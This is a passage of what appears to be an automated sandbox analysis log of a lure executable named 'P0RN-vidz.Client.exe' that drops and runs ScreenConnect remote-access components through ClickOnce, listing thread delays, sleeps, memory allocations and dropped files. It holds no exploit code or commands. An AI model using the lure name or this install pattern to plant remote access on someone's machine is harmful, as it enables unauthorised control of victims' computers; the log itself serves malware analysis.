                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 2C70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 11D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1D50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1FA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1D50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599642Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599363Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598887Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598493Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595901Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595767Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595006Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594717Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2173Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe TID: 6496Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599642s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599363s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598997s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598887s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598493s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598123s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597884s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597721s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597565s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596561s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595901s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595767s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595006s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594717s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592500s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2876Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe TID: 8012Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00374B9B FindFirstFileExA,0_2_00374B9B
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599642Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599363Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598887Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598493Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595901Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595767Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595006Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594717Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
